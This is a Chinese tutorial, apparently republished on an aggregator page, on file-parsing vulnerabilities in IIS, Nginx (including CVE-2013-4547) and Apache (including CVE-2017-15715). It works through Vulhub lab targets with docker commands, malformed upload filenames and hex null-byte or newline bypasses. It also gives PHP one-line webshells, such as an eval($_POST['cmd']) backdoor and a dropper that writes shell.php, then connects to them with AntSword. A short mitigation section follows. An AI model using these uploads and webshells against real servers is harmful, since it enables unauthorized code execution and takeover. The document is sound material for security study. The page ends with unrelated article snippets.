文件解析漏洞--IIS--Vulhub

news2024/11/17 0:02:00

文件解析漏洞

一、IIS解析漏洞

用windowserver2003安装IIS测试

1.1 IIS6.X

方法一:目录解析

在网站下建立文件夹的名字为.asp/.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

image-20240730164916230

1.txt文件里是asp文件的语法查看当前时间

image-20240730165151786

image-20240730165251530

方法二:畸形文件解析

​ 在IIS6处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx。

1.asp;.jpg文件内容为<%=now()%>

image-20240730165502527

image-20240730165616438

1.2 IIS7.X

​ 在IIS7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php解析为 php 文件。

利用条件
  1. php.ini里的cgi.fix_pathinfo=1 开启
  2. lS7在Fast-CGl运行模式下
环境配置

下载phpstudy

网址:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn)

image-20240730170055760

步骤二:配置 php.ini文件,将cgi.fix_pathinfo=1 前;删除…并重启…

image-20240730170308000

配置IIS的网站

GetShell

步骤一:将PHP一句话木马写到1.php并更改后缀为1.jpg上传到目标站点…利用解析漏洞进行访问…

http://172.16.1.65:8980/1.jpg/.php

下面的1.jpg写的是phpinfo();

image-20240730170758495

第二步:用菜刀、蚁剑连接

1.3:修复方式

#1.程序方面
1、对新建目录文件名进行过滤,不允许新建包含.的文件夹。
2、取消网站后台新建目录的功能,不允许新建目录。

#2.服务器方面
1、限制上传目录的脚本执行权限,不允许执行脚本。
2、过滤.asp/xm.jpg,通过ISApi组件过滤。 在httpd.ini加入了以下规则 ASP RewriteRule(.*).asp/(.*)/no.gif RewriteRule(.*).Asp/(.*)/no.gif RewriteRule(.*).aSp/(.*)/no.gif RewriteRule(.*).asP/(.*)/no.gif

二、Nginx解析漏洞

2.1:nginx_parsing

​ 这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。

利用条件
  • Nginx <=0.8.37
  • cgi.fix_pathinfo=1
利用姿势

Nginx的文件解析漏洞…和I1S7.0的解析漏洞同样的原理,因为 cqi.fix pathinfo=1 造成的解析漏洞…

PS:同样使用1.jpg/.php 方式进行绕过…

案例

步骤一:进入以下Vulhub路径并开启容器…

cd /nginx/nginx_parsing_vulnerability
docker-compose up -d
docker ps -a

步骤二:浏览器中访问网站…

http://192.168.30.131/

image-20240730171709964

步骤三:制作图片码上传

image-20240730171830476

image-20240730171836862

访问图片位置,在后方加上/.php

http://192.168.30.131/uploadfiles/969bd13f5b5a5d582c2a6ef02212b1ae.jpg/.php

image-20240730171928197

步骤四:用蚁剑连接shell

image-20240730172047154

GetShell

步骤一:在shell.jpg中写入以下代码…

GIF89a<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二:上传该图片并访问…紧接着利用解析漏洞执行其中的PHP代码

http://192.168.30.131/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg/.php

访问jpg文件后缀加/.php解析成php执行

image-20240730173413299

然后访问shell.php页面为空

image-20240730173436198

蚁剑连接shell

image-20240730173505258

2.2:CVE-2013-4547

​ 此漏洞为文件名逻辑漏洞,该漏洞在上传图片时,修改其16进制编码可使其绕过策略,导致解析为php。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。

影响版本

Nginx 0.8.411.4.3/1.5.01.5.7

利用姿势

步骤一:使用以下命令启动靶机并通过浏览器访问靶场页面.

cd vulhub-master/nginx/CVE-2013-4547x  //切换到靶机目录
docker-compose up -d     //打开环境
#靶场页面
http://101.42.118.221:8080

#info.php
<?php phpinfo();?>

步骤二:直接上传 info.php 被拦截…

修改文件后缀为.jpg进行BP抓包上传—>filename在后面添加空格并给上.php 后,在16进制修改中将原本连个空格的 0x20 0x20 修改为如下即 0x20 0x00 进行发包…

image-20240730182936808

image-20240730183212194

放包后页面上传成功

image-20240730183236064

访问

http://192.168.30.131:8089/uploadfiles/shell.jpg%20%20.php

image-20240730183459480

抓包

image-20240730183527374

将%20%20替换成两空格,然后替换16进制从0x20 0x20 替换成0x20 0x00

image-20240730183714750

image-20240730183737683

放行,访问成功

image-20240730183801981

GetShell

如果上传

<?php @eval($_POST['cmd']);?>

里面有空格无法处理就会变成

image-20240730184050328

我们用这句话上传一个shell.php

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

用以上的方法加两个空格修改16进制即可

最后可以发现能访问到

image-20240730184457079

image-20240730184557046

蚁剑连接

image-20240730184634137

三、Apache解析漏洞

3.1:apache_parsing

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析就再往左判断。如1.php.xxxxx

利用姿势

步骤一:进入Vulhub靶场并执行以下命令启动靶场…

cd /root/vulhub/httpd/apache_parsing_vulnerability
vi docker-compose.yml 修改端口和版本号
docker-compose up -d

image-20240730185336766

步骤二:访问靶机并上传 shell.php.jpg 文件,文件内容为 phpinfo 函数

image-20240730185621458

image-20240730185631551

3.2:CVE-2017-15715

​ Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

影响版本

2.4.0~2.4.29

利用姿势

步骤一:进入Vulhub靶场并开启目标靶机,进行访问…

cd /root/vulhub/httpd/CVE-2017-15715
vi docker-compose.yml  //配置文件,修改端口和版本号
docker-compose up -d //开启

image-20240730190127043

访问

http://192.168.30.131:8091/

image-20240730190313421

步骤二:尝试上传一句话木马文件,发现被拦截…

然后抓包在evil.php后面加上空格,16进制0x20改成0x0a–>放包

image-20240730190639563

image-20240730190714926

访问evil.php文件

image-20240730190755689

蚁剑连接shell

image-20240730190818784

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1963389.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

PSO求解函数最小值的MATLAB例程|MATLAB源代码

本篇文章适合PSO入门&#xff0c;进阶的可能会觉得太简单的。 目录 PSO例程作用运行结果代码函数解释 例程修改tips PSO Particle Swarm Optimization&#xff0c;粒子群优化算法&#xff0c;通过模拟鸟群或鱼群的行为来寻找最优解。在计算时通过对一群粒子的位置和速度进行迭…

Stable Diffusion Windows本地部署超详细教程(手动+自动+整合包三种方式)

2022年作为AIGC&#xff08;Artificial Intelligence Generated Content&#xff09;时代的元年&#xff0c;各个领域的AIGC技术都有一个迅猛的发展&#xff0c;给工业界、学术界、投资界甚至竞赛界都注入了新的“AI活力”与“AI势能”。 其中在AI绘画领域&#xff0c;Stable D…

内部类练习题

代码&#xff1a; public static void main(String[] args) {A anew A();a.f(); } class A{private String name"A";public void f(){class B{private String name"B";public void show(){System.out.println("A姓名为&#xff1a;"A.this.name…

智慧校园实训管理:打造高效实验项目管理系统

在智慧校园的实训管理框架中&#xff0c;实验项目管理功能是培养学生实践能力和创新精神的关键一环。这一功能通过数字化手段&#xff0c;实现了实验项目的全流程管理&#xff0c;从项目设计、资源调配、过程监控到成果评估&#xff0c;确保了实训活动的高效开展和教学质量的稳…

LabVIEW打开的视频格式IMAQ AVI Open

LabVIEW打开的视频格式IMAQ AVI Open LabVIEW所支持的视频解码器是有限的&#xff0c;不能支持所有的视频解码器。如果解码器选择的不正确&#xff0c;会出现的错误。 错误提示信息如下&#xff1a; Error -1074396009 occurred at IMAQ AVI Open Possible reason(s): An inter…

人工智能大模型发展带来的风险挑战和对策

经过近70年的发展&#xff0c;人工智能技术发展经历了三次起伏&#xff0c;2022年以来&#xff0c;以ChatGPT、Sora等为代表的预训练大模型持续取得突破&#xff0c;推动着人工智能技术从感知向认识&#xff0c;从分析判断式向生成式&#xff0c;从专用向通用进入快速发展的新阶…

提供一个下载国外DockerHub镜像的办法

由于众所周知的一些问题&#xff0c;国内现在下载国外的镜像比较难。尤其是比较新的版本的时候。 比如阿里云加速器的镜像库&#xff0c;skywalking-oap的最新版本也只有8.9&#xff0c;有时候不满足业务需要。官网目前最新10.0.1。很多情况下我们需要9以上版本。 提供几个办…

tomcat使用问题:安装后无法访问localhost:8080

一、tomcat 未启动 所以http://localhost:8080打不开&#xff1b; 二、环境变量未配置 tomcat图标显示已启动&#xff0c;但http://localhost:8080还是打不开&#xff0c;可能是环境变量没有配置好&#xff0c;关于怎么配置环境变量网上到处都是,一下仅供参考&#xff1a; …

halcon_C#联合halcon打开摄像头

1. 创建halcon项目 -> 2.测试连接 -> 3. 在halcon中打开摄像头成功 -> 4. 插入代码 -> 5. 导出为.cs文件 6. 创建VS项目 -> 7.将action部分代码嵌入winform -> 8. 编写代码 -> // 导入HalconDotNet命名空间&#xff0c;这是用于Halcon图像处理的…

MySQL存储引擎和

MySQL存储引擎 在数据库中保存的是一张张有着千丝万缕关系的表&#xff0c;所以表设计的好坏&#xff0c;将直接影响着整个数据库。而在设计表的时候&#xff0c;最关注的一个问题是使用什么存储引擎。MySQL中的数据用各种不同的技术存储在文件(或者内存)中。这些技术中的每一种…

redis面试(四)ZSet数据结构

Sorted Set 有序集合ZSet&#xff0c;但是有序集合的英文明明是sorted sets。 那这个“Z”代表什么意思&#xff0c;这点官网没有解释&#xff0c;但是gitHub上有人问过&#xff0c;作者是这样回答的 Hello. Z is as in XYZ, so the idea is, sets with another dimension: t…

Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案

概述 在使用Selenium和WebDriver进行网页自动化时&#xff0c;可能会遇到各种错误。其中一个常见问题是执行格式错误&#xff08;Errno 8 Exec format error&#xff09;。这个错误通常在运行ChromeDriver时出现&#xff0c;错误提示涉及路径中的某个文件&#xff0c;如THIRD_…

WordPress建站教程:零基础新手小白如何B2B外贸建站

如果你想通过独立站拿询盘获取订单&#xff0c;那么必须先要有一个自己的网站&#xff0c;所以建站是你绕不过去的一件事。对于零基础的新手小白来说&#xff0c;如何从零开始搭建一个B2B外贸网站呢&#xff1f;本文将为你提供一份详细的WordPress建站教程&#xff0c;帮助你从…

NodeJS云观影应用系统-计算机毕业设计源码60580

摘 要 随着互联网与移动互联网迅速普及&#xff0c;网络上的电影娱乐信息数量相当庞大&#xff0c;人们对获取感兴趣的电影娱乐信息的需求越来越大,个性化的基于Vue框架实现云观影应用系统成为一个热门。然而电影信息的表示相当复杂&#xff0c;因此需要开发一个基于Vue框架实…

Navicat for MySQL 17 实现更明智的业务决策

5 月 12 日&#xff0c;Navicat 对现有产品进行了几项重大更新&#xff0c;包括 Navicat Premium、Navicat BI 和 Navicat Data Modeler。最受欢迎的 Navicat 工具之一&#xff0c;Navicat for MySQL&#xff0c;也得到了新的更新&#xff0c;获得了许多与 Navicat Premium 相同…

PostgreSQL——查询扫描介绍

顺序扫描 概述 顺序扫描&#xff08;Sequential Scan&#xff09;是PostgreSQL中一种基本的数据检索方式&#xff0c;它通过按顺序读取表中的所有页面来查找满足查询条件的记录。这种方式不依赖于索引&#xff0c;因此在某些情况下可能是唯一的选择&#xff0c;尤其是当表没有…

熵权法确定权重

熵权法&#xff08;Entropy Weight Method, EWM&#xff09;是一种在综合考虑各因素提供信息量基础上计算综合指标的数学方法&#xff0c;属于客观综合定权法&#xff0c;在确定权重时更有说服力。该方法主要根据各指标传递给决策者的信息量大小来确定权重。在信息论中&#xf…

AIGC diffusers文生图模型optimum量化使用案例

参考: https://github.com/huggingface/blog/blob/main/quanto-diffusers.md 安装 pip install optimum-quanto %pip install optimum使用 from optimum.quanto import freeze, qfloat8, quantize from diffusers import PixArtSigmaPipeline import torchpipeline = PixArt…

离线安装部署docker,内网离线安装部署docker,以及docker常用命令

1.下载docker的离线安装包 链接: https://pan.baidu.com/s/1beDBIYw-8IjJj5syGnHiZA 提取码: 8888 复制这段内容后打开百度网盘手机App&#xff0c;操作更方便哦 2.将二进制文件&#xff1a;docker-20.10.19.tgz 拖入服务器目录/home/admin/解压 tar -zxvf docker-20.10.19.…

喜讯 华焰天下荣获绿色低碳诚信企业、碳中和承诺示范单位、信用评价 AAA 级信用企业等系列证书

在推动可持续发展和构建诚信商业环境的道路上&#xff0c;华焰天下再次传来令人振奋的消息&#xff01;近日&#xff0c;华焰天下凭借其在绿色低碳领域的卓越表现、坚定不移的碳中和承诺以及高度可靠的信用体系&#xff0c;成功荣获绿色低碳诚信企业、碳中和承诺示范单位、信用…